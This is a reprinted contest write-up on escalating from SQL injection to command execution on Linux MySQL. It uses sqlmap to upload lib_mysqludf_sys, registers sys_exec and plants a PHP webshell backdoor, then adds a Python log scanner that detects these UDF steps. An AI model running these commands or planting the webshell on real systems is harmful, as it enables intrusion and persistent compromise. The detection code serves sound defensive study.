A few days ago, a small contest included this challenge: a POST injection vulnerability was found in the login page of a given test environment, so I ran sqlmap against it to dump the data and found that the current MySQL connection user was root, which made me think of UDF privilege escalation. Although this has basically never been a problem with MySQL under Windows, it had never succeeded for me under Linux. The main issue is that MySQL runs with root permission. My notes follow for future reference.
The specific steps are as follows:
- Find the MySQL plug-in directory:
python sqlmap.py -u 'http://xxxx' --sql-shell
show variables like "%plugin%";
- Use sqlmap to upload lib_mysqludf_sys to the MySQL plug-in directory:
python sqlmap.py -u 'http://xxxx' --file-write=/lib_mysqludf_sys.so --file-dest=/usr/lib/mysql/plugin/
- Activate the "sys_exec" function:
python sqlmap.py -u 'http://xxxx' --sql-shell
CREATE FUNCTION sys_exec RETURNS STRING SONAME 'lib_mysqludf_sys.so';
SELECT * FROM information_schema.routines;
SELECT sys_exec('id');
- Also use sqlmap to upload the backdoor program:
python sqlmap.py -u 'http://xxx' --file-write=C:/phpspy.php --file-dest=/var/www/spy.php
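Seen from the database side, the steps above leave recognizable statements in the MySQL general query log. The following is an added detection example, not part of the original notes: it flags the plug-in directory lookup, any `CREATE FUNCTION ... SONAME` registration, and later calls to a registered function. The log line layout, the sample lines, and the names `run_cmd` and `other.so` are constructed for illustration.

```python
import re

# CREATE [AGGREGATE] FUNCTION [IF NOT EXISTS] name RETURNS type SONAME 'lib.so'
UDF_CREATE = re.compile(
    r"\bCREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+(?:IF\s+NOT\s+EXISTS\s+)?`?(\w+)`?\s+"
    r"RETURNS\s+\w+\s+SONAME\s+['\"]?([\w.\-]+)", re.IGNORECASE)
# SHOW VARIABLES LIKE '%plugin%' and close variants
PLUGIN_RECON = re.compile(
    r"\bSHOW\s+(?:GLOBAL\s+)?VARIABLES\s+LIKE\s+['\"][^'\"]*plugin", re.IGNORECASE)

def scan_general_log(lines, known_udfs=("sys_exec",)):
    """Return (line_no, rule, detail) findings for UDF abuse indicators."""
    udfs = {name.lower() for name in known_udfs}
    findings = []
    for no, line in enumerate(lines, 1):
        m = UDF_CREATE.search(line)
        if m:
            udfs.add(m.group(1).lower())  # later calls to this name are flagged too
            findings.append((no, "udf_registered", f"{m.group(1)} <- {m.group(2)}"))
            continue
        if PLUGIN_RECON.search(line):
            findings.append((no, "plugin_dir_lookup", line.strip()))
            continue
        for name in sorted(udfs):
            if re.search(rf"\b{re.escape(name)}\s*\(", line, re.IGNORECASE):
                findings.append((no, "udf_called", name))
                break
    return findings

# Constructed sample lines in a simplified "timestamp thread-id Query statement" layout
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z 41 Query SELECT id, name FROM users WHERE id = 7",
    '2024-05-01T10:00:09Z 42 Query show variables like "%plugin%"',
    "2024-05-01T10:00:30Z 42 Query CREATE FUNCTION sys_exec RETURNS STRING SONAME 'lib_mysqludf_sys.so'",
    "2024-05-01T10:00:31Z 42 Query SELECT sys_exec('id')",
    '2024-05-01T10:00:40Z 43 Query create function run_cmd returns integer soname "other.so"',
    "2024-05-01T10:00:41Z 43 Query SELECT RUN_CMD('x')",
]

if __name__ == "__main__":
    for finding in scan_general_log(SAMPLE_LOG):
        print(finding)
```

On a server where the web application never registers UDFs, any `udf_registered` finding from the application's connection is worth an alert on its own.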
Testing environment
- Linux Ubuntu 11.04 (Natty Narwhal)
- PHP 5.3.5, Apache 2.2.17
- MySQL 5
Reference material
- http://forelsec.blogspot.com/2012/08/solving-pwn0s-v2.html
- https://github.com/mysqludf/lib_mysqludf_sys
- https://code.google.com/p/mysql-udf-http/
[via @ network] Note: This article is reprinted from the network, and the source is not signed by the author. If the author sees this article, please leave a message and we will supplement it in time.